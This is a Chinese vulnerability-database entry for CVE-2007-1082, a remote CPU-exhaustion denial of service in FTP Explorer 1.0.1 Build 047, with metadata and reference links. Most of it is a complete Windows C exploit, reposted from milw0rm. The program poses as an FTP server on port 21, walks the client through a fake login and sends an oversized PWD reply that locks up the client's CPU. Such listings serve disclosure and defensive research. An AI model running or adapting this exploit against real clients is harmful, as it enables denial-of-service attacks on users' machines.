FTP Explorer PWD 参数拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112254 漏洞类型 资源管理错误
发布时间 2007-02-20 更新时间 2007-03-27
CVE编号 CVE-2007-1082 CNNVD-ID CNNVD-200702-424
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/3347
https://www.securityfocus.com/bid/22640
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-424
|漏洞详情
FTPExplorer1.0.1Build047和1.0.1.52之前的其他版本中,远程服务器对PWD指令的过长响应会导致拒绝服务(CPU资源耗费)。
|漏洞EXP
/***********************************************************************************
*           FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption)              *
*                                                                                  *
* FTP Explorer is prone to a DoS after receiving a long PWD response leading to    *
* 100% CPU consumption.                                                            *
* Have Fun!                                                                        *
*                                                                                  *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                                      *
***********************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
	char recvbuff[1024];
	char evilbuff[30000];
	sockaddr_in sin;
	int server,client;
	WSADATA wsaData;
	WSAStartup(MAKEWORD(1,1), &wsaData);

	server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	sin.sin_family = PF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	sin.sin_port = htons( 21 );
	bind(server,(SOCKADDR*)&sin,sizeof(sin));

	printf("[+] FTP Explorer Remote CPU consumption DoS\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	printf("[*] Listening on port 21 ...\n");
	listen(server,5);
	printf("[*] Waiting for client ...\n");
	client=accept(server,NULL,NULL);
	printf("[+] Client connected\n");
	memcpy(evilbuff,"220 Hello there\r\n\0",18);

	if (send(client,evilbuff,strlen(evilbuff),0)==-1)
	{
		printf("[-] Error in send!\n");
		exit(-1);
	}

	//USER
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
    	memcpy(evilbuff,"331 \r\n\0",7);
	send(client,evilbuff,strlen(evilbuff),0);

	//PASS
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	memcpy(evilbuff,"230 \r\n\0",7);
	send(client,evilbuff,strlen(evilbuff),0);

	//SYST 
	memset(recvbuff,'\0',1024);
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
	send(client,evilbuff,strlen(evilbuff),0);

	//PWD
	int i=5;
	memset(recvbuff,'\0',1024);
	recv(client,recvbuff,1024,0);
	printf("%s", recvbuff);
	while (i<25000) {
		memset(evilbuff+i,'a',1);
		i++;
		memset(evilbuff+i,'/',1);
		i++;
	}
	memcpy(evilbuff,"257 \"",5);
	memcpy(evilbuff+25000,"\"\r\n\0",4);
	send(client,evilbuff,strlen(evilbuff),0);

	Sleep(100);
	printf("[+] Must be 100%% CPU consuming\n");
	closesocket(client);
	closesocket(server);
	return 0;

}

// milw0rm.com [2007-02-20]
|受影响的产品
FTPx FTP Explorer 1.0.1 Build 047
|参考资料

来源:VIM
名称:20070324VendorACKforFTPxDoS(CVE-2007-1082)
链接:http://www.attrition.org/pipermail/vim/2007-March/001470.html
来源:XF
名称:ftpexplorer-pwd-dos(32606)
链接:http://xforce.iss.net/xforce/xfdb/32606
来源:BID
名称:22640
链接:http://www.securityfocus.com/bid/22640
来源:MILW0RM
名称:3347
链接:http://www.milw0rm.com/exploits/3347
来源:OSVDB
名称:33496
链接:http://osvdb.org/33496